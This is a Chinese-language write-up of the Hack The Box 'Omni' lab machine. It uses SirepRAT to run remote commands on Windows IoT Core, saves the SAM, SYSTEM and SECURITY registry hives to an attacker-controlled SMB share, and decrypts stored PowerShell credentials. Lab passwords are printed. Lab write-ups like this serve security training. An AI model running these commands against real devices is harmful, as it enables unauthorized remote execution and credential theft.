Omni-htb-writeup

0x00 靶场技能介绍

章节技能：HTTP协议头泄露服务基础信息、SirepRAT.py工具使用、转储哈希值、powershell命令行函数读取文件

参考链接：https://sidthoviti.com/omni-hackthebox-writeup/

参考链接：https://0xdf.gitlab.io/2021/01/09/htb-omni.html

0x01 用户权限获取

1、这个靶机区别于前面的Windows或者Linux靶机，属于硬件层的一个靶机，难顶啊！！！

2、获取下IP地址：10.10.10.204

3、扫描下开放端口情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.204
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-25 09:54 CST
Nmap scan report for 10.10.10.204
Host is up (0.37s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
5985/tcp  open  wsman
8080/tcp  open  http-proxy
29817/tcp open  unknown
29819/tcp open  unknown
29820/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 21.58 seconds
                                                                                                       
┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
135,5985,8080,29817,29819,29820,                                                                                                       
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p135,5985,8080,29817,29819,29820 -sC -sV --min-rate=10000 10.10.10.204
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-25 09:57 CST
Nmap scan report for 10.10.10.204
Host is up (0.36s latency).

PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.94SVN%I=7%D=3/25%Time=6600DA10%P=aarch64-unknown-linu
SF:x-gnu%r(NULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericL
SF:ines,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa
SF:5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\x
SF:a9m\x1c\xc9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.79 seconds

4、查看下8080端口的服务信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl -v http://10.10.10.204:8080/ 
*   Trying 10.10.10.204:8080...
* Connected to 10.10.10.204 (10.10.10.204) port 8080
> GET / HTTP/1.1
> Host: 10.10.10.204:8080
> User-Agent: curl/8.5.0
> Accept: */*
> 
< HTTP/1.1 401 Unauthorized
< Set-Cookie: CSRF-Token=JLeyZQcYu3yj78Otqsvw8ZwXpDVCQGyx
< Server: Microsoft-HTTPAPI/2.0
< WWW-Authenticate: Basic realm="Windows Device Portal"
< Date: Mon, 25 Mar 2024 09:15:46 GMT
< Content-Length: 0
< 
* Connection #0 to host 10.10.10.204 left intact


Windows Device Portal

5、多次错误尝试后，就会出现以下信息

6、使用谷歌搜索 Windows Device Portal 会发现以下漏洞利用工具

https://github.com/SafeBreach-Labs/SirepRAT?source=post_page-----8777ef78c0b3--------------------------------

7、经初步尝试，发现是可以利用的

┌──(kali㉿offsec)-[~/Desktop/SirepRAT-master]
└─$ python3 SirepRAT.py 10.10.10.204 GetSystemInformationFromDevice
<SystemInformationResult | type: 51, payload length: 32, kv: {'dwOSVersionInfoSize': 0, 'dwMajorVersion': 10, 'dwMinorVersion': 0, 'dwBuildNumber': 17763, 'dwPlatformId': 2, 'szCSDVersion': 0, 'wServicePackMajor': 1, 'wServicePackMinor': 2, 'wSuiteMask': 0, 'wProductType': 0, 'wReserved': 0}>
  
┌──(kali㉿offsec)-[~/Desktop/SirepRAT-master]
└─$ python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c net use \\10.10.14.11\share /u:test test'
<HResultResult | type: 1, payload length: 4, HResult: 0x0>

8、这里根据演练报告室通过转储哈希值进行破解，先起一个SMB共享服务

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-smbserver share . -smb2support -username test -password test
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

9、现在我要跑去reg save备份我需要的三个文件，sam、system、security

┌──(kali㉿offsec)-[~/Desktop/SirepRAT-master]
└─$ python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c net use \\10.10.14.11\share /u:test test'
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
                                                                                                       
┌──(kali㉿offsec)-[~/Desktop/SirepRAT-master]
└─$ python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c reg save HKLM\sam \\10.10.14.11\share\sam'
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 40, payload peek: 'b'The operation completed successfully.\r\r\n''>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: 'b'\x00\x00\x00\x00''>

                                                                                                       
┌──(kali㉿offsec)-[~/Desktop/SirepRAT-master]
└─$ python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c reg save HKLM\system \\10.10.14.11\share\system'
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
                                                                                                       
┌──(kali㉿offsec)-[~/Desktop/SirepRAT-master]
└─$ python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c reg save HKLM\security \\10.10.14.11\share\security'
<HResultResult | type: 1, payload length: 4, HResult: 0x0>

10、开始转储哈希值

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-secretsdump -sam sam -security security -system system LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[-] read length must be non-negative or -1
[*] Cleaning up... 

11、行不动，换方法吧。。。。可能靶机有问题了。。。。

12、尝试各种方法进行设置

13、也是不行，看截图吧，这里直接略过这个步骤吧

14、参考演练报告，直接获取一些用户账号密码信息

type "C:\Data\Users\app\user.txt"

C:\>type \data\users\app\user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS>
    </Props>
  </Obj>
</Objs>

15、略过解密，获取到网站的账号密码信息

app:mesh5143

16、开始登录系统后台

http://10.10.10.204:8080/#Device%20Settings

17、找到命令执行的地方获取第一个flag信息

powershell -c "$credential = import-clixml -path C:\Data\Users\app\user.txt;$credential.GetNetworkCredential().password"

0x02 系统权限获取

18、获取管理员用户的密码信息

powershell -c "$credential = import-clixml -path C:\Data\Users\app\iotadmin.xml;$credential.GetNetworkCredential().password"


administrator / _1nt3rn37ofTh1nGz ,

19、切换账号登录，获取最终flag信息

powershell -c "$credential = import-clixml -path C:\Data\Users\Administrator\root.txt;$credential.GetNetworkCredential().password"

20、感受就是，靶机环境太恶劣了，都不想好好打了。。。

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/271